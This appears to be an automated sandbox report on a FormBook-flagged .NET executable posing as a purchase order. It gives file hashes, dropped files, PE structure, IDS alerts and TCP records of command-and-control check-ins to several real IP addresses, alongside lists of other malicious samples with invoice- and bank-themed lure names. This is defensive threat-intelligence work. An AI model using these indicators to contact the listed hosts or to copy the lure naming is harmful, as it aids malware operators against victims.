                                                                                                      https://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gifGet hashmaliciousUnknownBrowse
                                                                                                      • 44.230.175.247
                                                                                                      900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                                      • 52.216.214.9
                                                                                                      https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                      • 13.35.58.119
                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 3.170.115.43
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 54.171.230.55
                                                                                                      http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                      • 52.24.205.146
                                                                                                      VNPT-AS-VNVNPTCorpVNQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.46.205
                                                                                                      Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.49.193
                                                                                                      protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 202.92.4.57
                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.49.193
                                                                                                      yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.186.221.243
                                                                                                      yakuza.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.248.237.190
                                                                                                      http://weststoneltd.technolutionszzzz.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                      • 203.161.41.21
                                                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 113.189.0.97
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.248.199.46
                                                                                                      PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 203.161.46.205

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 20495088.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\PO 20495088.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1216
                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                      Malicious:true
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1172
                                                                                                      Entropy (8bit):5.334969974494148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3hWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:xWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                      MD5:9A86426245C2DB332CCD92130B01087D
                                                                                                      SHA1:258015A0D102C1C60AF508E52F5172C4E9E64ECC
                                                                                                      SHA-256:4F40A508B46C447C257EFEB321A864AE4B4D8168C2A0DDAE70E60778BA1B37E4
                                                                                                      SHA-512:C9CB989F69F7B4F12872CBDB8CFF919D63F47D62C727C4D4AE4E66E128939575783B391242825E27AE7C15654510FD1A7D601EF23C4799F749FBD9BB3A4D4FC6
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                      C:\Users\user\AppData\Local\Temp\4t-S77XJ

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1seztyv.3on.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1gwwfjw.bcd.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxq3f4tx.mkz.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxpgeydc.vnt.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.97070844261029
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:PO 20495088.exe
                                                                                                      File size:710'144 bytes
                                                                                                      MD5:68465dd1e3101b1bfa0cff10ebadb8cc
                                                                                                      SHA1:31a5c7aa99d175e9ed04c325831c8ad7b281a255
                                                                                                      SHA256:d709e53e4afc4e29076812e41282fe82bcf2f3d73abe7016f13a41f432f4bd75
                                                                                                      SHA512:1675df94ed6fe694ae61a9fe170d0281454d3ba3f6ac3ae977d311581a42b28dc973a64d841370d00adb0911cd1b2d7569dbba8398a4b704ba35d22d4256f63d
                                                                                                      SSDEEP:12288:kxHD/s0yzbqUs19GN9sj5E4rUSsXm2sPHooPabg8SXiI8YcB2mTxI/OBXu:mjGbqiAjOTHXm2voCbgzXiIxmt1k8X
                                                                                                      TLSH:13E423C136EC6D2FD6B58A394C60CC644EB66067A512F6BC0FCD60CA8D56B0E0B51E6B
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g..............0.............z.... ........@.. ....................... ............`................................

                                                                                                      File Icon

                                                                                                      Icon Hash:69d3e4646c6c4e4e

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4add7a
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x673A858F [Mon Nov 18 00:08:47 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xadd250x4f.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1278.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xac4a80x54.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xabd800xabe008d5585b1becd71f1777a0d5834b4295aFalse0.9682855113636364data7.977130763165481IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xae0000x12780x1400b652d66636a4004229fc85b6044d9096False0.6830078125data6.6941378585979345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xb00000xc0x200c6c98fab209d61c82e5ca9911e0177d8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0xae0c80xea7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8216475606504932
                                                                                                      RT_GROUP_ICON0xaef800x14data1.05
                                                                                                      RT_VERSION0xaefa40x2cedata0.4387186629526462

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-11-18T13:53:55.227011+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54998113.248.169.4880TCP
                                                                                                      2024-11-18T13:54:11.191475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983208.91.197.2780TCP
                                                                                                      2024-11-18T13:54:13.720381+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549984208.91.197.2780TCP
                                                                                                      2024-11-18T13:54:16.283499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549985208.91.197.2780TCP
                                                                                                      2024-11-18T13:54:19.559545+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549986208.91.197.2780TCP
                                                                                                      2024-11-18T13:54:25.903982+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987149.115.238.4480TCP
                                                                                                      2024-11-18T13:54:28.439248+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988149.115.238.4480TCP
                                                                                                      2024-11-18T13:54:31.002383+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549989149.115.238.4480TCP
                                                                                                      2024-11-18T13:54:33.545770+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549990149.115.238.4480TCP
                                                                                                      2024-11-18T13:54:39.371399+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999175.2.103.2380TCP
                                                                                                      2024-11-18T13:54:41.914814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999275.2.103.2380TCP
                                                                                                      2024-11-18T13:54:44.536201+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999375.2.103.2380TCP
                                                                                                      2024-11-18T13:54:47.013061+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999475.2.103.2380TCP
                                                                                                      2024-11-18T13:54:52.679411+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499953.33.130.19080TCP
                                                                                                      2024-11-18T13:54:55.249077+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499963.33.130.19080TCP
                                                                                                      2024-11-18T13:54:57.793693+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499973.33.130.19080TCP
                                                                                                      2024-11-18T13:55:00.343673+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499983.33.130.19080TCP
                                                                                                      2024-11-18T13:55:06.170220+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549999203.161.49.19380TCP
                                                                                                      2024-11-18T13:55:08.732594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550000203.161.49.19380TCP
                                                                                                      2024-11-18T13:55:11.279589+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001203.161.49.19380TCP
                                                                                                      2024-11-18T13:55:13.810779+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550002203.161.49.19380TCP
                                                                                                      2024-11-18T13:55:20.373450+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003104.21.74.7980TCP
                                                                                                      2024-11-18T13:55:22.916474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004104.21.74.7980TCP
                                                                                                      2024-11-18T13:55:25.468482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005104.21.74.7980TCP
                                                                                                      2024-11-18T13:55:28.069698+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550006104.21.74.7980TCP
                                                                                                      2024-11-18T13:55:33.729770+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000715.197.204.5680TCP
                                                                                                      2024-11-18T13:55:36.299878+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000815.197.204.5680TCP
                                                                                                      2024-11-18T13:55:38.839198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000915.197.204.5680TCP
                                                                                                      2024-11-18T13:55:41.385027+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001015.197.204.5680TCP
                                                                                                      2024-11-18T13:55:47.418870+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011188.114.97.380TCP
                                                                                                      2024-11-18T13:55:49.916029+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012188.114.97.380TCP
                                                                                                      2024-11-18T13:55:52.522957+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013188.114.97.380TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 18, 2024 13:53:54.517088890 CET4998180192.168.2.513.248.169.48
                                                                                                      Nov 18, 2024 13:53:54.522011995 CET804998113.248.169.48192.168.2.5
                                                                                                      Nov 18, 2024 13:53:54.522078037 CET4998180192.168.2.513.248.169.48
                                                                                                      Nov 18, 2024 13:53:54.536928892 CET4998180192.168.2.513.248.169.48
                                                                                                      Nov 18, 2024 13:53:54.541877031 CET804998113.248.169.48192.168.2.5
                                                                                                      Nov 18, 2024 13:53:55.193813086 CET804998113.248.169.48192.168.2.5
                                                                                                      Nov 18, 2024 13:53:55.226898909 CET804998113.248.169.48192.168.2.5
                                                                                                      Nov 18, 2024 13:53:55.227010965 CET4998180192.168.2.513.248.169.48
                                                                                                      Nov 18, 2024 13:53:55.228164911 CET4998180192.168.2.513.248.169.48
                                                                                                      Nov 18, 2024 13:53:55.233042955 CET804998113.248.169.48192.168.2.5
                                                                                                      Nov 18, 2024 13:54:10.581257105 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:10.586203098 CET8049983208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:10.586327076 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:10.600955009 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:10.605914116 CET8049983208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:11.191390991 CET8049983208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:11.191474915 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:12.107860088 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:12.112806082 CET8049983208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.125946999 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.131542921 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.131681919 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.140285015 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.145541906 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.720292091 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.720381021 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:14.654769897 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:14.659797907 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:15.673496008 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.678456068 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:15.678611994 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.692220926 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.697542906 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:15.697554111 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:16.283394098 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:16.283499002 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:17.201472044 CET4998580192.168.2.5208.91.197.27
